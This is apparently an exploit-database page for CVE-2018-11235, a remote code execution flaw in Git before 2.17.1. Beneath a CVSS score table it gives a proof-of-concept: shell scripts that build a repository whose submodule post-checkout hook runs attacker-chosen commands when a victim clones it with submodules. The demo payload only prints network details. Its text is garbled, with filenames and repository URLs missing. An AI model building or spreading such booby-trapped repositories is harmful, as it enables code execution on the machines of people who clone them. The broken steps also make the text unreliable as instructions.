Git < 2.17.1 Remote Code Execution

Credit: JameelNabbo
Risk: High
Local: No
Remote: Yes

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Git (code execution) # Date: 2018-05-29 # Exploit Author: JameelNabbo # Website: <> # Vendor Homepage: <> # CVE: CVE-2018-11235 #Version: <=2.17.1 # Tested on Kali Linux P0C: Create two files: the file which will contain our commands to be executed the fole which contain a normal build with a bit of calls to our file add the follwing to #!/bin/sh cat << EOF #here we can put our lovely commands Exploited! : $(ifconfig) EOF #-------- Add the follwing to file: #!/bin/sh set -e repo_dir="$PWD/repo" #change it to any other Repo repo_submodule='' git init "$repo_dir" cd "$repo_dir" git submodule add "$repo_submodule" pwned mkdir modules cp -r .git/modules/pwned modules cp ../ modules/pwned/hooks/post-checkout git config -f .gitmodules submodule.pwned.update checkout git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned git add modules git submodule add "$repo_submodule" git add SmartWorm git commit -am pwned echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`” —————— Solution:

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top